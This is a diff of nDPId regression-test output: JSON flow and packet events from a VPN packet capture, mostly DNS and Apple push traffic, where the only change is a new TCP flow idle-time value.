00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1569687267493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569687267493,"pkt":"NDY7z3UoLH6BsEqhCABFAABJAABAADoRnytLS0tLCgAA4wA136UANZKzv52BgAABAAEAAAAAB21vemlsbGEDb3JnAAABAAHADAABAAEAAAAaAAQ\/9dDD"} 00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1569687267500,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1569687267500,"pkt":"NDY7z3UoLH6BsEqhCABFAADkAABAADoRnpBLS0tLCgAA4wA189sA0PLn7RaBgAABAAUAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQABwAwABQABAAAAIwAeDGRldGVjdHBvcnRhbARwcm9kBm1vemF3cwNuZXQAwDYABQABAAAADgAoDGRldGVjdHBvcnRhbAdmaXJlZm94BmNvbS12MgllZGdlc3VpdGXAT8BgAAUAAQAAUnoAFAVhMTA4OQRkc2NkBmFrYW1hacBPwJQAAQABAAAACQAEuBk4UsCUAAEAAQAAAAkABLgZODM="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"} -00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267797,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267797,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"} +00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267797,"flow_last_seen":1569687267797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267797,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAAA72BEAAP8RQicKAADjS0tLS+u1ADUAJxlWhe8BAAABAAAAAAAAA3d3dwVhcHBsZQNjb20AAAEAAQ=="} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -224,16 +224,16 @@ 00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1569687267819,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1569687267819,"pkt":"NDY7z3UoLH6BsEqhCABFAACwAABAADoRnsRLS0tLCgAA4wA1x3QAnFOt9V6BgAABAAMAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQABwAwABQABAAAYQwAlATESY291cmllci1wdXNoLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA2AAUAAQAAABcAHQ91cy1zdy1jb3VyaWVyLTQKcHVzaC1hcHBsZcBLwGcAAQABAAAAFwAEETmQdA=="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1569687267824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1569687267824,"pkt":"NDY7z3UoLH6BsEqhCABFAACyAABAADoRnsJLS0tLCgAA4wA1+sEAnlIeE96BgAABAAMAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAASVMAJgIyNBJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAGwAdD3VzLXN3LWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAAuAAQROZAU"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1569687267831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687267831,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3jBMAAP8RjikKAADjS0tLS8J1ADUAI5qcqN8BAAABAAAAAAAABWFwcGxlA2NvbQAAAQAB"} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABnAABAADoRnw1LS0tLCgAA4wA1wnUAU2BUqN+BgAABAAMAAAAABWFwcGxlA2NvbQAAAQABwAwAAQABAAAE+gAEEbJgO8AMAAEAAQAABPoABBGOoDvADAABAAEAAAT6AAQRrOAv"} 00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABNAABAADoRnydLS0tLCgAA4wA1yxYAOeBneJ6BgAABAAEAAAAABG1haWwGdmlhc2F0A2NvbQAAAQABwAwAAQABAAAAPAAECCVnxA=="} @@ -243,17 +243,17 @@ 